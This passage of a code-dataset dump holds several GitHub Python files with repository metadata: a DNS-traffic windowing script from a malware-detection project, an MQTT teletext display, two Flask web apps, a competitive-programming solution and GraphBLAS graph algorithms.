\"first\" integer[] DEFAULT '{0,0,0}'::integer[],\n \"last\" integer[] DEFAULT '{0,0,0}'::integer[],\n\n \"begin_time\" real DEFAULT 0.0,\n \"end_time\" real DEFAULT 0.0,\n\n \"app\" integer[] DEFAULT '{0,0,0}'::integer[],\n \"unique\" integer[] DEFAULT '{0,0,0}'::integer[],\n\n \"nx\" integer DEFAULT 0,\n\n \"gt09\" double precision,\n\n \"llr\" double precision[] DEFAULT '{0,0,0}'::double precision[],\n \"llr_t\" double precision[] DEFAULT '{0,0,0}'::double precision[],\n\n CONSTRAINT window_qr_4_pkey PRIMARY KEY (id)\n)\n\nTABLESPACE pg_default;\n\nALTER TABLE public.window_qr_4\n OWNER to postgres;\n\"\"\"\n\ncur = db.cursor()\n\ncur.execute(query)\n\ncur.close()\n\ndb.commit()\n\nBATCH_SIZE = 10_000_000\n\npd.options.display.float_format = '{:.2f}'.format\n\nfor idx, pcap in df_pcap.iterrows():\n\n cur = db.cursor()\n\n query = \"\"\"SELECT m3.fn,\n is_response\n FROM message3 as m3\n WHERE pcap_id=%d\n ORDER BY fn\"\"\" % pcap.id\n df_fn = pd.read_sql(query, db)\n\n df_fn_q = df_fn[~df_fn.is_response].fn.to_frame().copy()\n df_fn_q['n'] = np.arange(df_fn_q.shape[0])\n df_fn_q['batch'] = df_fn_q['n'] // BATCH_SIZE\n\n print(\"Processing pcap %d [%d/%d]\" % (pcap.id, idx, df_pcap.shape[0]))\n\n for s in windows[::-1]:\n \n # the windows bounds are defined by the number of queries (qnum = s), because I suppose\n # that is better to trigger the intrusion detector whit a threshold dependent on the number of queries.\n df_fn_q_s = df_fn_q.copy()\n df_fn_q_s['window'] = df_fn_q_s['n'] // s\n df_fn_q_s = df_fn_q_s[['window', 'fn']].groupby(by='window').aggregate(['first']).reset_index()\n df_fn_q_s.columns = ['window', 'first_fn']\n df_fn_q_s['last_fn'] = df_fn_q_s['first_fn'].shift(-1, fill_value=df_fn.fn.max() + 1) - 1\n df_fn_q_s['batch'] = df_fn_q_s['last_fn'] // BATCH_SIZE\n\n for i in range(df_fn_q_s.batch.max()+1):\n df_fn_q_s_batch = df_fn_q_s[df_fn_q_s.batch == i]\n\n first_fn_bacth = 
first_fn_batch = df_fn_q_s_batch['first_fn'].min()\n            last_fn_batch = df_fn_q_s_batch['last_fn'].max()\n\n            tic = time.perf_counter()\n            query = (\n                \"\"\"SELECT m3.*, dn.\"logit.0\"[1] as logit, dn.top10m\n                FROM message3 as m3 JOIN dn ON m3.dn_id=dn.id\n                WHERE pcap_id=%d AND fn >= %d AND fn <= %d\n                ORDER BY fn\"\"\"\n                % (\n                    pcap.id,\n                    first_fn_batch,\n                    last_fn_batch\n                )\n            )\n            df_w_batch = pd.read_sql(query, db)\n\n            df_w_batch['nx'] = (df_w_batch.rcode == 3)\n            df_w_batch['nlegit'] = (df_w_batch.top10m >= 1_000_000)\n\n            print(\"Fetching from %d <= fn <= %d for pcap_%d and size=%d\" % (first_fn_batch, last_fn_batch, pcap.id, s))\n            values = []\n            for (_, s_window) in df_fn_q_s_batch.iterrows():\n\n                first_fn = s_window['first_fn']\n                last_fn = s_window['last_fn']\n\n                df_qr = df_w_batch.iloc[first_fn:last_fn+1]\n                df_q = df_qr[~df_qr.is_response]\n                df_r = df_qr[df_qr.is_response]\n                if df_r.shape[0] == 0:\n                    df_r = df_r.append(pd.Series(0, index=df_r.columns), ignore_index=True)\n\n                dfs = [df_qr, df_q, df_r]\n\n                sum_cols = [\"app\", \"ok\", \"txt\", \"nx\", \"no\", \"other\", \"llr\"]\n\n                app = [ _df.shape[0] for _df in dfs ]\n\n                first = [ _df.iloc[0].fn for _df in dfs ]\n                last = [ _df.iloc[-1].fn for _df in dfs ]\n\n                begin_time = df_qr.iloc[0].time_s\n                end_time = df_qr.iloc[-1].time_s\n\n                nunique = [ _df.dn_id.drop_duplicates().shape[0] for _df in dfs ]\n\n                nx = df_r.nx.sum()\n\n                gt09 = (dfs[1].logit > 0.9).sum()\n\n                llr = [ _df.logit.sum() for _df in dfs ]\n\n                llr_t = [ _df.logit[_df.nlegit].sum() for _df in dfs ]\n\n                def cv(v):\n                    if type(v).__module__ == np.__name__:\n                        return v.item()\n                    if type(v).__name__ == \"list\":\n                        return [ vv.item() if type(vv).__module__ == np.__name__ else vv for vv in v ]\n                    return v\n\n                values.append([ cv(v) for v in [pcap.id, s, s_window['window'], first, last, begin_time, end_time, app, nunique, nx, gt09, llr, llr_t ] ])\n                pass #end window\n            # print(\"\\n\".join([v.__str__() for v in values]))\n            # print()\n            execute_values(\n                cur,\n                \"\"\"INSERT INTO public.window_qr_4(\n                pcap_id, size, \"window\", first, last, begin_time, end_time, app, \"unique\", nx, gt09, llr, llr_t)\n                VALUES %s;\"\"\",\n                values\n            )\n            pass #end batch\n        db.commit()\n        pass #end batches\n    pass #end pcap\n    cur.close()\n", "repo_name": "princio/malware_detection", "sub_path": "src/python/windowing_r.py", "file_name": "windowing_r.py", "file_ext": "py", "file_size_in_byte": 6253, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "pprint.PrettyPrinter", "line_number": 10, "usage_type": "call"}, {"api_name": "psycopg2.connect", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 31, "usage_type": "call"}, {"api_name": "pandas.read_sql", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.lcm.reduce", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.lcm", "line_number": 46, "usage_type": "attribute"}, {"api_name": "pandas.options", "line_number": 93, "usage_type": "attribute"}, {"api_name": "pandas.read_sql", "line_number": 104, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 107, "usage_type": "call"}, {"api_name": "time.perf_counter", "line_number": 129, "usage_type": "call"}, {"api_name": "pandas.read_sql", "line_number": 141, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 157, "usage_type": "call"}, {"api_name": "numpy.__name__", "line_number": 182, "usage_type": "attribute"}, 
{"api_name": "numpy.__name__", "line_number": 185, "usage_type": "attribute"}, {"api_name": "psycopg2.extras.execute_values", "line_number": 192, "usage_type": "call"}]} +{"seq_id": "11658182637", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nteletext.py\nMIT License (c) Faure Systems <dev at faure dot systems>\n\nDisplays message received from MQTT server in fullscreen on main monitor and play a sound.\n\nTo switch MQTT broker, kill the program and start again with new arguments.\nUse -d option to start in windowed mode instead of fullscreen.\n\nusage: python3 teletext.py [-h] [-s SERVER] [-p PORT] [-d] [-l LOGGER]\n\noptional arguments:\n -h, --help show this help message and exit\n -s SERVER, --server SERVER\n change MQTT server host\n -p PORT, --port PORT change MQTT server port\n -d, --debug set DEBUG log level\n -l LOGGER, --logger LOGGER\n use logging config file\n\nTo switch MQTT broker, kill the program and start again with new arguments.\n\"\"\"\n\nimport paho.mqtt.client as mqtt\nimport os, sys, uuid\n\nfrom constants import *\nfrom TeletextApp import TeletextApp\nfrom Singleton import Singleton, SingletonException\n\n\nme = None\ntry:\n me = Singleton()\nexcept SingletonException:\n sys.exit(-1)\nexcept BaseException as e:\n print(e)\n\nos.chdir(os.path.dirname(os.path.abspath(__file__)))\n\n# translation\nimport gettext\n\ntry:\n gettext.find(APPLICATION)\n traduction = gettext.translation(APPLICATION, localedir='locale', languages=['fr'])\n traduction.install()\nexcept:\n _ = gettext.gettext # cool, this hides PyLint warning Undefined name '_'\n\nmqtt_client = mqtt.Client(uuid.uuid4().urn, clean_session=True, userdata=None)\n\napp = TeletextApp(sys.argv, mqtt_client, debugging_mqtt=False)\n\n# guizero event loop\napp.loop()\n\ndel me\n\nsys.exit(0)\n", "repo_name": "xcape-io/PyTeletextProps", "sub_path": "teletext.py", "file_name": "teletext.py", "file_ext": "py", "file_size_in_byte": 1575, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "88", "api": [{"api_name": "Singleton.Singleton", "line_number": 36, "usage_type": "call"}, {"api_name": "Singleton.SingletonException", "line_number": 37, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 38, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 42, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 42, "usage_type": "call"}, {"api_name": "os.path", "line_number": 42, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 42, "usage_type": "call"}, {"api_name": "gettext.find", "line_number": 48, "usage_type": "call"}, {"api_name": "gettext.translation", "line_number": 49, "usage_type": "call"}, {"api_name": "gettext.gettext", "line_number": 52, "usage_type": "attribute"}, {"api_name": "paho.mqtt.client.Client", "line_number": 54, "usage_type": "call"}, {"api_name": "paho.mqtt.client", "line_number": 54, "usage_type": "name"}, {"api_name": "uuid.uuid4", "line_number": 54, "usage_type": "call"}, {"api_name": "TeletextApp.TeletextApp", "line_number": 56, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 56, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 63, "usage_type": "call"}]} +{"seq_id": "9671636402", "text": "from flask import Flask, jsonify, request\nfrom flask_cors import CORS\nfrom data_loader import update_database\nfrom mongo import mongo_driver\nfrom bson.json_util import dumps\nimport pandas as pd\nimport json\nimport api_functions as api\n\n# 
Establish a database connection\nDB_NAME = \"reviews-db\"\nCOLLECTION_NAME = \"reviews-collection\"\n\n# base route for this api version\nbase_api_route = '/api/v0/'\n\ndb = mongo_driver()\n\n# PreCompute the instructor and course lists\ninstructor_list = api.SearchAutocomplete(db, 'instructor')\ncourse_list = api.SearchAutocomplete(db, 'course')\n\napp = Flask(__name__)\nCORS(app)\n\n# useful for testing\n# curl -i http://localhost:5050/api/v0/\n\n@app.route('/')\ndef hello_world():\n    return 'Ping <a href=\"/api/v0/\">/api/v0/</a> for api'.format(str(request.remote_addr))\n\n@app.route(base_api_route, methods=['GET'])\ndef root_api():\n    return jsonify({'message': 'You have reached the api root endpoint. Please see the Github page for information on the endpoints to hit: https://github.com/stev-ou/stev-api'})\n\n# Search for all entries for autocomplete\n@app.route(base_api_route+'<string:search_type>/all')\ndef course_autocomplete_api(search_type):\n    if search_type == 'instructors':\n        return jsonify({'result':instructor_list})\n    elif search_type =='courses':\n        return jsonify({'result':course_list})\n    else:\n        return jsonify({})\n\n### APIs for Course search\ncourse_suffix_function_map = {'figure1':api.CourseFig1Table, 'figure2':api.CourseFig2Chart, \n'figure3':api.CourseFig3Timeseries, 'figure4':api.CourseFig4TableBar}\n\n
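# For example: GET /api/v0/courses/<course_uuid>/figure2 resolves through this map to\n# api.CourseFig2Chart and is called below as func(db, course_uuid).\n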
"usage_type": "attribute"}, {"api_name": "api_functions.CourseFig3Timeseries", "line_number": 49, "usage_type": "attribute"}, {"api_name": "api_functions.CourseFig4TableBar", "line_number": 49, "usage_type": "attribute"}, {"api_name": "flask.jsonify", "line_number": 55, "usage_type": "call"}, {"api_name": "api_functions.InstructorFig1Table", "line_number": 58, "usage_type": "attribute"}, {"api_name": "api_functions.InstructorFig2Timeseries", "line_number": 58, "usage_type": "attribute"}, {"api_name": "api_functions.InstructorFig3TableBar", "line_number": 59, "usage_type": "attribute"}, {"api_name": "api_functions.InstructorChipAPI", "line_number": 59, "usage_type": "attribute"}, {"api_name": "flask.jsonify", "line_number": 65, "usage_type": "call"}, {"api_name": "data_loader.update_database", "line_number": 69, "usage_type": "call"}]} +{"seq_id": "74729726047", "text": "# #최대값을 구하는 문제이기 때문에 N개의 알파벳이 주어지면\n# #알파벳을 9부터 큰 순서대로 N개 바꾸면됨\n# from sys import stdin\n# alpha = dict()##문자값과 숫자 변환시켜주는 배열\n# def calc(a, letters, d):\n# m = len(letters)\n# sum = 0\n# for i in range(m):\n# alpha[letters[i]] = d[i]\n# for word in a:\n# now = 0\n# for char in word:\n# now = now*10+ alpha[char]\n# sum+=now\n# return sum\n# def next_permutation(N, A):\n# ans = []\n# i = N - 1\n# while i > 0 and A[i] <= A[i - 1]: # 내림차순인지 검사한다.\n# i -= 1\n# if i <= 0:\n# return False\n# j = N - 1\n# while A[j] <= A[i - 1]: # 뒷 숫자들은 이미 내림차순이므로 i-1보다 큰 첫번째 수가 최소값\n# j -= 1\n# A[i - 1], A[j] = A[j], A[i - 1]\n# j = N-1\n# while i<j:\n# A[i], A[j] = A[j], A[i]\n# i+=1\n# j-=1\n# return True\n# N = int(input())\n# a = ['']*N\n# letters = set()#중복제거\n# for i in range(N):\n# a[i] = stdin.readline()\n# letters |= set(a[i]) #merge 연산자, letters.update(set(a[i]))와 같음\n# letters = list(letters)\n# m = len(letters)\n# d=[]\n# for i in range(m):\n# d.append(9-i)\n# d.sort()\n# ans = 0\n# while True:\n# now = calc(a, letters, d)\n# if ans<now:\n# ans = now\n# if not next_permutation(m, d):\n# break\n# print(ans)\n#\n\n##문자를 자릿수로 번역\n##가장 수가 큰 문자부터 변환\nimport collections\nfrom collections import defaultdict\n\nn= int(input())\nalpha = defaultdict(int)\nnums=[]\nfor _ in range(n):\n word = list(input())\n nums.append(word)\n for i in range(len(word)):\n alpha[word[i]]+= 10**(len(word)-i-1)\n\nsorted_alpha = collections.OrderedDict(sorted(alpha.items(), key=lambda x:-x[1]))\nmapping={}\ncurr=9\nfor char in sorted_alpha:\n mapping[char] = curr\n curr-=1\n if curr<0:\n break\nres=0\nfor char,count in alpha.items():\n res+=mapping[char]*count\n\nprint(res)\n\n\n\n\n", "repo_name": "inudev5/Algo-study", "sub_path": "BOJ/1339.py", "file_name": "1339.py", "file_ext": "py", "file_size_in_byte": 2053, "program_lang": "python", "lang": "ko", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "88", "api": [{"api_name": "collections.defaultdict", "line_number": 61, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 69, "usage_type": "call"}]} +{"seq_id": "37998611370", "text": "from flask import Flask, render_template, request, jsonify\nimport requests\n\napp = Flask(__name__)\napp.config[\"DEBUG\"] = True\n\n@app.route(\"/\")\ndef hello():\n return render_template(\"intro.html\")\n\n@app.route(\"/render\")\ndef render():\n return render_template(\"js.html\")\n\n# @app.route(\"/search/<search_query>\")\n# def search(search_query):\n# url = \"https://api.github.com/search/repositories?q=\" + search_query\n# responseJSON = requests.get(url).json()\n# return 
jsonify(parse_response(responseJSON))\n\n@app.route(\"/search\", methods=[\"GET\", \"POST\"])\ndef search():\n if request.method == \"POST\":\n if request.form[\"user_search\"] == \"\":\n return render_template(\"search.html\", msg = \"Please enter a search request!\")\n else: \n url = \"https://api.github.com/search/repositories?q=\" + request.form[\"user_search\"]\n try:\n response_dict = requests.get(url).json()\n except: #connection error\n return render_template(\"search.html\", msg = \"Please enter your search request!\")\n else:\n # if not response_dict[\"items\"]: #error response\n # print response_dict\n # return render_template(\"search.html\", msg = \"No results found! Enter another search request: \")\n # # return jsonify(parse_response(response_dict))\n # else: \n return render_template(\"results.html\", user_search = request.form[\"user_search\"], gh_data = response_dict)\n else: # request.method == \"GET\"\n return render_template(\"search.html\")\n\ndef parse_response(response_dict):\n clean_dict = {\n \"total_count\": response_dict[\"total_count\"],\n \"items\":[]\n }\n for repo in response_dict[\"items\"]:\n clean_repo = {\n \"name\": repo[\"name\"],\n \"owner\": {\n \"login\": repo[\"owner\"][\"login\"],\n \"avatar_url\": repo[\"owner\"][\"avatar_url\"],\n \"html_url\": repo[\"owner\"][\"html_url\"]\n },\n \"html_url\": repo[\"html_url\"],\n \"description\": repo[\"description\"]\n }\n clean_dict[\"items\"].append(clean_repo)\n return clean_dict\n\n@app.errorhandler(404)\ndef page_not_found(error):\n return \"Sorry, this page was not found.\", 404\n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\")", "repo_name": "gzgracez/testFlask", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 2359, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "86", "api": [{"api_name": "flask.Flask", "line_number": 4, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 9, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 13, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 23, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 23, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 24, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 24, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 25, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 27, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 27, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 29, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 31, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 38, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 38, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 38, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 40, "usage_type": "call"}]} +{"seq_id": "6386449690", "text": "from metagraph import concrete_algorithm, NodeID\nfrom metagraph.plugins import has_grblas\nfrom metagraph.plugins.core import exceptions\nfrom typing import Tuple, Iterable, Any, Union, Optional\nimport numpy as np\n\nif has_grblas:\n import grblas as gb\n from .types import (\n GrblasEdgeSet,\n GrblasEdgeMap,\n GrblasGraph,\n GrblasNodeMap,\n GrblasNodeSet,\n GrblasVectorType,\n 
)\n\n @concrete_algorithm(\"clustering.triangle_count\")\n def grblas_triangle_count(graph: GrblasGraph) -> int:\n # Burkhardt method: num_triangles = sum(sum(A @ A) * A) / 6\n # We do it in two steps: a matrix multiplication then a reduction\n node_list, _ = graph.nodes.to_values()\n A = graph.value[node_list, node_list].new()\n val = A.mxm(\n A.T, # Transpose here assumes symmetric matrix stored by row (the default for SuiteSparse:GraphBLAS)\n gb.semiring.plus_pair[\n gb.dtypes.UINT64\n ], # `pair` binary operator returns 1; be dtype-agnostic\n ).new(\n mask=A.S\n ) # Using a (structural) mask is equivalent to the elementwise multiplication step\n return val.reduce_scalar().value // 6\n\n @concrete_algorithm(\"centrality.pagerank\")\n def grblas_pagerank(\n graph: GrblasGraph, damping: float, maxiter: int, tolerance: float\n ) -> GrblasNodeMap:\n # `scale_edges` matrix does the bulk of the work; it's what distributes\n # the current value of a vertex to its neighbors\n A = graph.value\n N = A.ncols\n scale_edges = A.apply(gb.unary.one).new(dtype=float)\n node_scale = scale_edges.reduce_rows().new() # num edges\n node_scale << node_scale.apply(gb.unary.minv) # 1 / num_edges\n index, vals = node_scale.to_values() # TODO: implement diag and use here\n node_scale_diag = gb.Matrix.from_values(index, index, vals, ncols=N, nrows=N)\n scale_edges(mask=scale_edges.S)[:, :] = damping\n scale_edges << scale_edges.T.mxm(node_scale_diag) # 0.85 / num_edges\n\n # `base` vector gets added to the result every iteration\n base = gb.Vector.new(float, N)\n base[:] = (1 - damping) / N\n\n # `r` vector holds the results\n r = gb.Vector.new(float, N)\n r[:] = 1 / N\n\n for i in range(maxiter):\n prev_r = r.dup()\n r << scale_edges.mxv(r)\n r << r.ewise_add(base, gb.monoid.plus)\n # now calculate the difference and check the tolerance\n prev_r << prev_r.ewise_mult(r, gb.binary.minus)\n prev_r << prev_r.apply(gb.unary.abs)\n err = prev_r.reduce().value\n if err < N * tolerance:\n break\n else:\n raise exceptions.ConvergenceError(\n f\"failed to converge within {maxiter} iterations\"\n )\n return GrblasNodeMap(r)\n\n @concrete_algorithm(\"util.graph.build\")\n def grblas_graph_build(\n edges: Union[GrblasEdgeSet, GrblasEdgeMap],\n nodes: Union[GrblasNodeSet, GrblasNodeMap, None],\n ) -> GrblasGraph:\n aprops = {\n \"edge_type\": \"map\" if isinstance(edges, GrblasEdgeMap) else \"set\",\n \"node_type\": \"map\" if isinstance(nodes, GrblasNodeMap) else \"set\",\n }\n m = edges.value\n if nodes is not None:\n nodes = nodes.value\n size = nodes.size\n if m.nrows < size:\n resized = gb.Matrix.new(m.dtype, nrows=size, ncols=size)\n resized[: m.nrows, : m.nrows] << m\n m = resized\n return GrblasGraph(m, nodes=nodes, aprops=aprops)\n\n @concrete_algorithm(\"subgraph.extract_subgraph\")\n def grblas_extract_subgraph(\n graph: GrblasGraph, nodes: GrblasNodeSet\n ) -> GrblasGraph:\n aprops = GrblasGraph.Type.compute_abstract_properties(\n graph, {\"is_directed\", \"node_type\", \"edge_type\", \"node_dtype\", \"edge_dtype\"}\n )\n g = graph.value\n chosen_nodes, _ = nodes.value.to_values()\n g2 = gb.Matrix.new(g.dtype, g.nrows, g.ncols)\n g2[chosen_nodes, chosen_nodes] << g[chosen_nodes, chosen_nodes].new()\n\n n = graph.nodes\n n2 = gb.Vector.new(n.dtype, n.size)\n n2[chosen_nodes] << n[chosen_nodes].new()\n gg = GrblasGraph(g2, n2)\n GrblasGraph.Type.preset_abstract_properties(gg, **aprops)\n return gg\n\n @concrete_algorithm(\"subgraph.sample.node_sampling\")\n def grblas_node_sampling(graph: GrblasGraph, p: float) -> 
GrblasGraph:\n # TODO: move this check into the abstract algorithm layer\n if p <= 0 or p > 1: # pragma: no cover\n raise ValueError(f\"Probability `p` must be between 0 and 1, found {p}\")\n all_nodes, _ = graph.nodes.to_values()\n chosen_indices = np.random.random(len(all_nodes)) < p\n chosen_nodes = all_nodes[chosen_indices]\n chosen_nodes = gb.Vector.from_values(chosen_nodes, np.ones_like(chosen_nodes))\n return grblas_extract_subgraph(graph, GrblasNodeSet(chosen_nodes))\n\n @concrete_algorithm(\"subgraph.sample.edge_sampling\")\n def grblas_edge_sampling(graph: GrblasGraph, p: float) -> GrblasGraph:\n # TODO: move this check into the abstract algorithm layer\n if p <= 0 or p > 1: # pragma: no cover\n raise ValueError(f\"Probability `p` must be between 0 and 1, found {p}\")\n aprops = GrblasGraph.Type.compute_abstract_properties(graph, \"node_type\")\n rows, cols, vals = graph.value.to_values()\n chosen_indices = np.random.random(len(rows)) < p\n rows = rows[chosen_indices]\n cols = cols[chosen_indices]\n vals = vals[chosen_indices]\n chosen_nodes = np.intersect1d(rows, cols)\n m = gb.Matrix.from_values(rows, cols, vals)\n if aprops[\"node_type\"] == \"map\":\n nidx, nvals = graph.nodes.to_values()\n nidx = np.array(nidx)\n nvals = np.array(nvals)[nidx.searchsorted(chosen_nodes)]\n nodes = gb.Vector.from_values(chosen_nodes, nvals)\n else:\n nodes = gb.Vector.from_values(chosen_nodes, np.ones_like(chosen_nodes))\n return GrblasGraph(m, nodes)\n\n @concrete_algorithm(\"subgraph.sample.ties\")\n def grblas_totally_induced_edge_sampling(\n graph: GrblasGraph, p: float\n ) -> GrblasGraph:\n # TODO: move this check into the abstract algorithm layer\n if p <= 0 or p > 1: # pragma: no cover\n raise ValueError(f\"Probability `p` must be between 0 and 1, found {p}\")\n aprops = GrblasGraph.Type.compute_abstract_properties(graph, \"is_directed\")\n if not aprops[\"is_directed\"]:\n # For undirected graphs, cut the probability in half to avoid overcounting edges\n p /= 2\n rows, cols, vals = graph.value.to_values()\n chosen_indices = np.random.random(len(rows)) < p\n rows = rows[chosen_indices]\n cols = cols[chosen_indices]\n chosen_nodes = np.union1d(rows, cols)\n chosen_nodes = gb.Vector.from_values(chosen_nodes, np.ones_like(chosen_nodes))\n gg = grblas_extract_subgraph(graph, GrblasNodeSet(chosen_nodes))\n return gg\n", "repo_name": "metagraph-dev/metagraph", "sub_path": "metagraph/plugins/graphblas/algorithms.py", "file_name": "algorithms.py", "file_ext": "py", "file_size_in_byte": 7185, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 25, "dataset": "github-code", "pt": "88", "api": [{"api_name": "metagraph.plugins.has_grblas", "line_number": 7, "usage_type": "name"}, {"api_name": "types.GrblasGraph", "line_number": 19, "usage_type": "name"}, {"api_name": "grblas.semiring", "line_number": 26, "usage_type": "attribute"}, {"api_name": "grblas.dtypes", "line_number": 27, "usage_type": "attribute"}, {"api_name": "metagraph.concrete_algorithm", "line_number": 18, "usage_type": "call"}, {"api_name": "types.GrblasGraph", "line_number": 36, "usage_type": "name"}, {"api_name": "grblas.unary", "line_number": 42, "usage_type": "attribute"}, {"api_name": "grblas.unary", "line_number": 44, "usage_type": "attribute"}, {"api_name": "grblas.Matrix.from_values", "line_number": 46, "usage_type": "call"}, {"api_name": "grblas.Matrix", "line_number": 46, "usage_type": "attribute"}, {"api_name": "grblas.Vector.new", "line_number": 51, "usage_type": "call"}, {"api_name": "grblas.Vector", 
"line_number": 51, "usage_type": "attribute"}, {"api_name": "grblas.Vector.new", "line_number": 55, "usage_type": "call"}, {"api_name": "grblas.Vector", "line_number": 55, "usage_type": "attribute"}, {"api_name": "grblas.monoid", "line_number": 61, "usage_type": "attribute"}, {"api_name": "grblas.binary", "line_number": 63, "usage_type": "attribute"}, {"api_name": "grblas.unary", "line_number": 64, "usage_type": "attribute"}, {"api_name": "metagraph.plugins.core.exceptions.ConvergenceError", "line_number": 69, "usage_type": "call"}, {"api_name": "metagraph.plugins.core.exceptions", "line_number": 69, "usage_type": "name"}, {"api_name": "types.GrblasNodeMap", "line_number": 72, "usage_type": "call"}, {"api_name": "metagraph.concrete_algorithm", "line_number": 34, "usage_type": "call"}, {"api_name": "types.GrblasNodeMap", "line_number": 37, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 76, "usage_type": "name"}, {"api_name": "types.GrblasEdgeSet", "line_number": 76, "usage_type": "name"}, {"api_name": "types.GrblasEdgeMap", "line_number": 76, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 77, "usage_type": "name"}, {"api_name": "types.GrblasNodeSet", "line_number": 77, "usage_type": "name"}, {"api_name": "types.GrblasNodeMap", "line_number": 77, "usage_type": "name"}, {"api_name": "types.GrblasEdgeMap", "line_number": 80, "usage_type": "argument"}, {"api_name": "types.GrblasNodeMap", "line_number": 81, "usage_type": "argument"}, {"api_name": "grblas.Matrix.new", "line_number": 88, "usage_type": "call"}, {"api_name": "grblas.Matrix", "line_number": 88, "usage_type": "attribute"}, {"api_name": "types.GrblasGraph", "line_number": 91, "usage_type": "call"}, {"api_name": "metagraph.concrete_algorithm", "line_number": 74, "usage_type": "call"}, {"api_name": "types.GrblasGraph", "line_number": 78, "usage_type": "name"}, {"api_name": "types.GrblasGraph", "line_number": 95, "usage_type": "name"}, {"api_name": "types.GrblasNodeSet", "line_number": 95, "usage_type": "name"}, {"api_name": "types.GrblasGraph.Type.compute_abstract_properties", "line_number": 97, "usage_type": "call"}, {"api_name": "types.GrblasGraph.Type", "line_number": 97, "usage_type": "attribute"}, {"api_name": "types.GrblasGraph", "line_number": 97, "usage_type": "name"}, {"api_name": "grblas.Matrix.new", "line_number": 102, "usage_type": "call"}, {"api_name": "grblas.Matrix", "line_number": 102, "usage_type": "attribute"}, {"api_name": "grblas.Vector.new", "line_number": 106, "usage_type": "call"}, {"api_name": "grblas.Vector", "line_number": 106, "usage_type": "attribute"}, {"api_name": "types.GrblasGraph", "line_number": 108, "usage_type": "call"}, {"api_name": "types.GrblasGraph.Type.preset_abstract_properties", "line_number": 109, "usage_type": "call"}, {"api_name": "types.GrblasGraph.Type", "line_number": 109, "usage_type": "attribute"}, {"api_name": "types.GrblasGraph", "line_number": 109, "usage_type": "name"}, {"api_name": "metagraph.concrete_algorithm", "line_number": 93, "usage_type": "call"}, {"api_name": "types.GrblasGraph", "line_number": 96, "usage_type": "name"}, {"api_name": "types.GrblasGraph", "line_number": 113, "usage_type": "name"}, {"api_name": "numpy.random.random", "line_number": 118, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 118, "usage_type": "attribute"}, {"api_name": "grblas.Vector.from_values", "line_number": 120, "usage_type": "call"}, {"api_name": "grblas.Vector", "line_number": 120, "usage_type": "attribute"}, {"api_name": 
"numpy.ones_like", "line_number": 120, "usage_type": "call"}, {"api_name": "types.GrblasNodeSet", "line_number": 121, "usage_type": "call"}, {"api_name": "metagraph.concrete_algorithm", "line_number": 112, "usage_type": "call"}, {"api_name": "types.GrblasGraph", "line_number": 124, "usage_type": "name"}, {"api_name": "types.GrblasGraph.Type.compute_abstract_properties", "line_number": 128, "usage_type": "call"}, {"api_name": "types.GrblasGraph.Type", "line_number": 128, "usage_type": "attribute"}, {"api_name": "types.GrblasGraph", "line_number": 128, "usage_type": "name"}, {"api_name": "numpy.random.random", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 130, "usage_type": "attribute"}, {"api_name": "numpy.intersect1d", "line_number": 134, "usage_type": "call"}, {"api_name": "grblas.Matrix.from_values", "line_number": 135, "usage_type": "call"}, {"api_name": "grblas.Matrix", "line_number": 135, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 138, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 139, "usage_type": "call"}, {"api_name": "grblas.Vector.from_values", "line_number": 140, "usage_type": "call"}, {"api_name": "grblas.Vector", "line_number": 140, "usage_type": "attribute"}, {"api_name": "grblas.Vector.from_values", "line_number": 142, "usage_type": "call"}, {"api_name": "grblas.Vector", "line_number": 142, "usage_type": "attribute"}, {"api_name": "numpy.ones_like", "line_number": 142, "usage_type": "call"}, {"api_name": "types.GrblasGraph", "line_number": 143, "usage_type": "call"}, {"api_name": "metagraph.concrete_algorithm", "line_number": 123, "usage_type": "call"}, {"api_name": "types.GrblasGraph", "line_number": 147, "usage_type": "name"}, {"api_name": "types.GrblasGraph.Type.compute_abstract_properties", "line_number": 152, "usage_type": "call"}, {"api_name": "types.GrblasGraph.Type", "line_number": 152, "usage_type": "attribute"}, {"api_name": "types.GrblasGraph", "line_number": 152, "usage_type": "name"}, {"api_name": "numpy.random.random", "line_number": 157, "usage_type": 